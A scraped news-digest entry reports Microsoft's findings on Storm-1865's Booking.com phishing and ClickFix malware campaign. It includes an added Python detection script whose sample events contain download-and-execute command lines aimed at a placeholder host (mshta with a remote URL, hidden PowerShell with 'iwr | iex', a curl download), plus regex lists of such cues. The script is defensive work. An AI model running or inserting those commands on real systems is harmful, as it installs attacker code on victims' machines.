Article Details

Scrape Timestamp (UTC): 2025-03-13 15:04:11.620

Source: https://www.theregister.com/2025/03/13/bookingdotcom_phishing_campaign/

Original Article Text


That 'angry guest' email from Booking.com? It's a scam, not a 1-star review. Phishers check in, your credentials check out, Microsoft warns.

An ongoing phishing campaign disguised as a Booking.com email casts keystroke- and credential-stealing malware into hospitality employees' inboxes for financial fraud and theft, according to Microsoft Threat Intelligence. Redmond says the email attacks began in December and were still happening as of February.

The threat intel team attributes the campaign to a group it tracks as Storm-1865, which in 2023 used a similar Booking.com-themed lure and social engineering techniques to target hotel guests, and last year targeted buyers on e-commerce platforms.

"These campaigns have been ongoing with increased volume since at least early 2023 and involve messages sent through vendor platforms, such as online travel agencies and e-commerce platforms, and email services, such as Gmail or iCloud Mail," according to a Thursday report that, oddly enough, doesn't name-drop Exchange or other Microsoft email services.

The latest credential-stealing attempts specifically target hospitality employees who likely work with Booking.com in North America, Oceania, South and Southeast Asia, and across Europe. While all of the emails impersonate the online travel agency, their content varies: they sometimes mention negative hotel guest reviews or requests from prospective travelers, or online promotion opportunities and account verification, anything to prompt a gut-reaction click from the person opening the email before they get a chance to consider the message's origin.

These emails include a link, or a PDF attachment containing a link, and you can probably guess what happens next. The link claims to take whoever clicks on it to Booking.com, but instead leads to an attacker-controlled website with a fake CAPTCHA puzzle. The phony CAPTCHA uses the ClickFix social engineering technique.

This is where an attacker displays a fake error message instructing the user to fix the issue by copying and pasting a command that ultimately downloads malware to the victim's device. Because the victim runs the command themselves, the malicious code is more likely to bypass built-in security features that key on a browser download or an email attachment. In this particular phishing campaign, the attackers prompt the user to use a keyboard shortcut to open Windows Run, and then paste a command that downloads and launches malware.

The campaign delivers multiple families of commodity malware, including XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT. Depending on the specific payload, the code launched through mshta.exe (the Windows HTML Application host that the pasted command invokes) varies. Some samples have downloaded PowerShell, JavaScript, and portable executable (PE) content. All of these payloads can steal credentials and financial data, which Microsoft says is one of Storm-1865's trademarks.

"Storm" is how Microsoft labels clusters of activity that are still in development, i.e. not yet attributed to a named actor (along the lines of how Russian groups all have "Blizzard" in their name and Chinese groups are "Typhoons"). Storm-1865, we're told, includes a cluster of phishing attacks leading to financial fraud.

A Microsoft spokesperson declined to answer The Register's questions, including the geographic region where Storm-1865 attacks originate and whether its activity overlaps with any other threat groups that Redmond is tracking. The spokesperson also declined to tell us how many organizations have been affected by this latest Booking.com phishing campaign.
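The ClickFix flow described above leaves a characteristic trace on the endpoint: whatever the victim pastes into the Run dialog executes as a direct child of explorer.exe, and in this campaign the launcher is mshta.exe pointed at a remote URL. The following Python is an added example (not code from The Register or from Microsoft's report) showing detection logic for that pattern over Sysmon-style process-creation events. The events, the hostname example.invalid and the command lines are constructed for the example and are not observed indicators from the campaign; a real deployment would feed it Sysmon Event ID 1 records exported from the event log.

```python
"""ClickFix detection over Sysmon-style process-creation events.

Added example, not code from The Register or Microsoft. Assumes events are
dicts keyed by Sysmon Event ID 1 field names (Image, ParentImage,
CommandLine). All sample events below are constructed, not real telemetry.
"""
import re
from dataclasses import dataclass

URL_RE = re.compile(r"https?://", re.IGNORECASE)

# Cues that a pasted one-liner fetches content and runs it.
DOWNLOAD_CUES = re.compile(
    r"(invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadstring|downloadfile|"
    r"invoke-expression|\biex\b|frombase64string|-enc\b|-encodedcommand|"
    r"-w\s+hidden|-windowstyle\s+hidden)",
    re.IGNORECASE,
)

# Binaries a ClickFix lure typically tells the victim to invoke from Run.
RUN_DIALOG_LOLBINS = {
    "mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
    "curl.exe", "certutil.exe", "bitsadmin.exe", "rundll32.exe",
}

# Constructed sample events (hostname example.invalid is a placeholder).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": r"C:\Windows\Explorer.EXE"},
    # ClickFix: mshta.exe pasted into Run, fetching a remote HTA
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://example.invalid/verify"},
    # ClickFix variant: hidden PowerShell download-and-execute from Run
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iwr https://example.invalid/a | iex"'},
    # Benign: local HTA launched by an admin script, no URL
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
    # Benign: user runs a local script from Run, no download cues
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell -NoProfile -File C:\scripts\backup.ps1"},
    # Suspicious but weaker signal: curl with a URL straight from Run
    {"Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "curl https://example.invalid/update.exe -o update.exe"},
]


@dataclass(frozen=True)
class Finding:
    index: int
    rule: str
    severity: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _from_run_dialog(event: dict) -> bool:
    # The Run dialog is hosted by explorer.exe, so a pasted command
    # appears as a direct child of explorer.exe.
    return _basename(event.get("ParentImage", "")) == "explorer.exe"


def classify(index: int, event: dict) -> list[Finding]:
    """Return the findings (if any) for one process-creation event."""
    image = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    has_url = bool(URL_RE.search(cmd))
    findings: list[Finding] = []
    # Rule 1: mshta.exe handed a remote URL, the launcher this campaign uses.
    if image == "mshta.exe" and has_url:
        findings.append(Finding(index, "mshta_remote_url", "high"))
    # Rule 2: PowerShell from the Run dialog with fetch-and-run cues.
    if image in ("powershell.exe", "pwsh.exe") and _from_run_dialog(event) \
            and DOWNLOAD_CUES.search(cmd):
        findings.append(Finding(index, "powershell_download_from_run_dialog", "high"))
    # Rule 3: any other common LOLBin given a URL straight from the Run dialog.
    if not findings and image in RUN_DIALOG_LOLBINS and _from_run_dialog(event) and has_url:
        findings.append(Finding(index, "lolbin_url_from_run_dialog", "medium"))
    return findings


def scan(events) -> list[Finding]:
    """Run classify() over a sequence of events and collect all findings."""
    out: list[Finding] = []
    for i, ev in enumerate(events):
        out.extend(classify(i, ev))
    return out


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"event {f.index}: {f.rule} [{f.severity}]")
```

During incident response, a hit from this logic can be corroborated on the host from the per-user RunMRU key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which keeps the Run dialog's history: a URL or an mshta/powershell one-liner recorded there is what a pasted ClickFix command looks like.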

Daily Brief Summary

MALWARE // Booking.com Email Scam Targets Hospitality Industry with Malware

An ongoing phishing campaign is targeting hospitality employees with emails spoofing Booking.com to distribute malware for financial theft, as reported by Microsoft Threat Intelligence.

The attacks, initiated in December and persisting until at least February, are orchestrated by a threat group Microsoft identifies as Storm-1865.

The phishing emails vary in content but commonly mention negative guest reviews or promotional opportunities, designed to elicit hasty clicks leading to credential theft.

These malicious emails typically contain a link, or a PDF file with a link, that directs victims to attacker-controlled websites displaying a fake CAPTCHA. The fake CAPTCHA tells the victim to open the Windows Run dialog and paste a command, which downloads and launches the malware.

The malware delivered through this campaign includes multiple types, such as XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT, aiming to steal sensitive information and financial details.

Storm-1865 belongs to the category of still-developing, not-yet-attributed activity clusters that Microsoft tracks under the "Storm" label, and is notable for its focus on financial fraud through phishing.

Microsoft has noted an increase in the volume of these attacks since early 2023, with messages sent both through vendor platforms such as online travel agencies and e-commerce sites and through consumer email services such as Gmail and iCloud Mail.